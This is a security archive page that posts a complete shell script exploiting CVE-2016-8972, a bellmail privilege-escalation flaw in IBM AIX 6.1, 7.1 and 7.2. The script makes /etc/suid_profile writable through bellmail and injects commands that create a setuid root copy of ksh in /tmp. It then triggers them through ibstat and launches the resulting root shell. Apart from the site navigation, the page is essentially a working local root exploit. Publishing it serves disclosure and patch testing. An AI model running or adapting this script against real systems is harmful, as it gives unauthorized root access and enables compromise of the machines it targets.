IBM AIX 6.1 / 7.1 / 7.2 Bellmail Privilege Escalation

IBM AIX 6.1 / 7.1 / 7.2 Bellmail Privilege Escalation: Posted Dec 22, 2016; Authored by Hector X. Monsegur; IBM AIX versions 6.1, 7.1, and 7.2 suffer from a Bellmail privilege escalation vulnerability.; tags | exploit; systems | aix; advisories | CVE-2016-8972; SHA-256 | 577087b11048468d456a5ce063092a8f85bcb6d7399a0d04a31068c2aecaf02a; Download | Favorite | View

IBM AIX 6.1 / 7.1 / 7.2 Bellmail Privilege Escalation

#!/usr/bin/sh
#
# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root
#
# Affected versions:
# AIX 6.1, 7.1, 7.2
# VIOS 2.2.x
#
#         Fileset                Lower Level  Upper Level KEY
#        ---------------------------------------------------------
#        bos.net.tcp.client       6.1.9.0      6.1.9.200   key_w_fs
#        bos.net.tcp.client       7.1.3.0      7.1.3.47    key_w_fs
#        bos.net.tcp.client       7.1.4.0      7.1.4.30    key_w_fs
#        bos.net.tcp.client_core  7.2.0.0      7.2.0.1     key_w_fs
#        bos.net.tcp.client_core  7.2.1.0      7.2.1.0     key_w_fs
#
# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc
# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/
# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com
 
ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}')
VULNBIN=/usr/bin/bellmail
SUIDPROFILE=/etc/suid_profile
 
function ESCALATE
{
    echo "[*] Preparing escalation"
 
    $VULNBIN >/dev/null 2>&1 <<EOD
s /etc/suid_profile
EOD
 
    if [ ! -w $SUIDPROFILE ]; then
        echo "[-] $SUIDPROFILE is not writable. Exploit failed."
        exit 1
    fi
 
    echo "[*] Clearing out $SUIDPROFILE"
    echo > /etc/suid_profile
 
    echo "[*] Injecting payload"
    cat << EOF >$SUIDPROFILE
cp /bin/ksh $ROOTSHELL
/usr/bin/syscall setreuid 0 0
chown root:system $ROOTSHELL
chmod 6755 $ROOTSHELL
rm -f $SUIDPROFILE
EOF
 
    echo "[*] Executing SUID to leverage privileges"
    /usr/bin/ibstat -a >/dev/null 2>&1
 
    if [ ! -x $ROOTSHELL ]; then
        echo "[-] Root shell does not exist or is not executable. Exploit failed."
        exit 1
    fi
 
    echo "[*] Escalating to root.."
    $ROOTSHELL
    echo "[*] Make sure to remove $ROOTSHELL"
}
 
echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL"
 
$VULNBIN -e
if [ $? -eq 0 ]
    then
        ESCALATE
        echo "[*] Make sure to remove $ROOTSHELL"
        exit 0
fi
 
echo "[*] Sending mail to non-existent user, force a bounce within ~minute"
/usr/bin/mail nonexistentuser <<EOD
.
.
.
EOD
 
echo "[*] Waiting for mail to come in."
 
while true
do
    $VULNBIN -e
    if [ $? -eq 0 ]
        then
            echo "[*] Mail found"
            ESCALATE
            break
        else
            echo "[-] Mail not received yet. Sleeping."
            sleep 10
        fi
done

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

IBM AIX 6.1 / 7.1 / 7.2 Bellmail Privilege Escalation

IBM AIX 6.1 / 7.1 / 7.2 Bellmail Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

IBM AIX 6.1 / 7.1 / 7.2 Bellmail Privilege Escalation

Share This

IBM AIX 6.1 / 7.1 / 7.2 Bellmail Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems